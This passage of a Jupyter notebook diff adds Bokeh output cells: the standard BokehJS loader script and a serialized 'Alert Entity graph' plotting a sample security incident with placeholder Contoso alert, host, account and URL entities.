  element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3387\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3388\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3388\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3388\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"cdbacdd2-a606-4b48-83ae-6a0568ac312b\" data-root-id=\"3389\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"d39085d9-ea3c-4326-a7fb-95877a94d733\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"3400\"}],\"center\":[{\"id\":\"3403\"},{\"id\":\"3407\"},{\"id\":\"3439\"},{\"id\":\"3440\"},{\"id\":\"3441\"},{\"id\":\"3442\"},{\"id\":\"3443\"}],\"height\":800,\"left\":[{\"id\":\"3404\"}],\"renderers\":[{\"id\":\"3424\"}],\"title\":{\"id\":\"3390\"},\"toolbar\":{\"id\":\"3415\"},\"width\":800,\"x_range\":{\"id\":\"3392\"},\"x_scale\":{\"id\":\"3396\"},\"y_range\":{\"id\":\"3394\"},\"y_scale\":{\"id\":\"3398\"}},\"id\":\"3389\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"text\":\"www.contoso.com\",\"text_font_size\":\"10pt\",\"x\":1.5474765760741906,\"x_offset\":5,\"y\":2.0,\"y_offset\":5},\"id\":\"3443\",\"type\":\"Label\"},{\"attributes\":{\"formatter\":{\"id\":\"3566\"},\"major_label_policy\":{\"id\":\"3565\"},\"ticker\":{\"id\":\"3401\"}},\"id\":\"3400\",\"type\":\"LinearAxis\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"3414\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"3434\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"3396\",\"type\":\"LinearScale\"},{\"attributes\":{\"text\":\"demo\",\"text_font_size\":\"10pt\",\"x\":0.6713871059158802,\"x_offset\":5,\"y\":0.8635038218640325,\"y_offset\":5},\"id\":\"3441\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"3413\",\"type\":\"HelpTool\"},{\"attributes\":{},\"id\":\"3401\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"3405\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"3404\"},\"dimension\":1,\"ticker\":null},\"id\":\"3407\",\"type\":\"Grid\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"3394\",\"type\":\"Range1d\"},{\"attributes\":{\"formatter\":{\"id\":\"3553\"},\"major_label_policy\":{\"id\":\"3552\"},\"ticker\":{\"id\":\"3405\"}},\"id\":\"3404\",\"type\":\"LinearAxis\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"3390\",\"type\":\"Title\"},{\"attributes\":{\"axis\":{\"id\":\"3400\"},\"ticker\":null},\"id\":\"3403\",\"type\":\"Grid\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"3392\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"3569\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3398\",\"type\":\"LinearScale\"},{\"attributes\":{\"data_source\":{\"id\":\"3426\"},\"glyph\":{\"id\":\"3434\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"3428\"}},\"id\":\"3427\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3570\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"text\":\"CONTOSO\\\\auser\",\"text_font_size\":\"10pt\",\"x\":-1.816494482163167,\"x_offset\":5,\"y\":-0.5206325212562211,\"y_offset\":5},\"id\":\"3442\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"text_font_size\":\"10pt\",\"x\":-0.04860716703159008,\"x_offset\":5,\"y\":-1.8883686440287462,\"y_offset\":5},\"id\":\"3440\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"3552\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"3409\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"3408\"},{\"id\":\"3409\"},{\"id\":\"3410\"},{\"id\":\"3411\"},{\"id\":\"3412\"},{\"id\":\"3413\"},{\"id\":\"3422\"}]},\"id\":\"3415\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"3553\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"3408\",\"type\":\"PanTool\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"3422\",\"type\":\"HoverTool\"},{\"attributes\":{\"overlay\":{\"id\":\"3414\"}},\"id\":\"3410\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"3411\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"3429\",\"type\":\"MultiLine\"},{\"attributes\":{},\"id\":\"3412\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"3571\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3560\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"3572\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"demo\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"start\":[\"Incident: Sample Incident\",\"Incident: Sample Incident\",\"Incident: Sample Incident\",\"demo\"]},\"selected\":{\"id\":\"3571\"},\"selection_policy\":{\"id\":\"3572\"}},\"id\":\"3430\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"3559\",\"type\":\"NodesOnly\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"green\",\"green\",\"green\"],\"description\":[\"2021-09-22T15:09:09.2786667Z - Sample Incident - 123\",\"User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']\",\"demo.demo.contoso.com (OSFamily.Windows)\",null,\"www.contoso.com\"],\"end_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null,null],\"entitytype\":[\"incident\",\"alert\",\"host\",\"account\",\"url\"],\"index\":[\"Incident: Sample Incident\",\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"demo\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"name\":[\"Sample Incident\",\"User Added to Priviledged Group in CONTOSO Domain\",\"demo\",\"CONTOSO\\\\auser\",\"www.contoso.com\"],\"node_color\":[\"red\",\"orange\",\"green\",\"green\",\"green\"],\"node_type\":[\"incident\",\"alert\",\"entity\",\"entity\",\"entity\"],\"source\":[null,\"{ 'AdditionalData': { 'ID': '8b7d06d8-dbae-4b23-87ed-1a27b75437d5',\\n                      'Name': 'User Added to Priviledged Group in CONTOSO Domain'},\\n  'DisplayName': 'User Added to Priviledged Group in CONTOSO Domain',\\n  'SystemAlertIds': ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5'],\\n  'Type': 'alerts',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DnsDomain': 'demo.contoso.com',\\n  'HostName': 'demo',\\n  'IsDomainJoined': False,\\n  'NetBiosName': 'demo',\\n  'OSFamily': <OSFamily.Windows: 1>,\\n  'Type': 'host',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DisplayName': 'CONTOSO\\\\\\\\auser',\\n  'IsDomainJoined': False,\\n  'Type': 'account',\\n  'edges': set()}\",\"{'AdditionalData': {}, 'Type': 'url', 'Url': 'www.contoso.com', 'edges': set()}\"],\"start_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null,null],\"time_generated\":[\"2021-09-22T15:09:09.2786667Z\",null,null,null,null]},\"selected\":{\"id\":\"3569\"},\"selection_policy\":{\"id\":\"3570\"}},\"id\":\"3426\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"source\":{\"id\":\"3426\"}},\"id\":\"3428\",\"type\":\"CDSView\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"3431\"},\"inspection_policy\":{\"id\":\"3559\"},\"layout_provider\":{\"id\":\"3433\"},\"node_renderer\":{\"id\":\"3427\"},\"selection_policy\":{\"id\":\"3560\"}},\"id\":\"3424\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"graph_layout\":{\"Alert: User Added to Priviledged Group in CONTOSO Domain\":[-0.04860716703159008,-1.8883686440287462],\"CONTOSO\\\\auser\":[-1.816494482163167,-0.5206325212562211],\"Incident: Sample Incident\":[-0.353762032795313,-0.4545026565790653],\"demo\":[0.6713871059158802,0.8635038218640325],\"www.contoso.com\":[1.5474765760741906,2.0]}},\"id\":\"3433\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{\"data_source\":{\"id\":\"3430\"},\"glyph\":{\"id\":\"3429\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"3432\"}},\"id\":\"3431\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3565\",\"type\":\"AllLabels\"},{\"attributes\":{\"source\":{\"id\":\"3430\"}},\"id\":\"3432\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3566\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"Incident: Sample Incident\",\"text_font_size\":\"10pt\",\"x\":-0.353762032795313,\"x_offset\":5,\"y\":-0.4545026565790653,\"y_offset\":5},\"id\":\"3439\",\"type\":\"Label\"}],\"root_ids\":[\"3389\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"d39085d9-ea3c-4326-a7fb-95877a94d733\",\"root_ids\":[\"3389\"],\"roots\":{\"3389\":\"cdbacdd2-a606-4b48-83ae-6a0568ac312b\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3389"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'3389', <span id=\"3696\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='3400', ...)],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='3403', ...), Grid(id='3407', ...), Label(id='3439', ...), Label(id='3440', ...), Label(id='3441', ...), Label(id='3442', ...), Label(id='3443', ...)],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='3404', ...)],</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"3695\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div 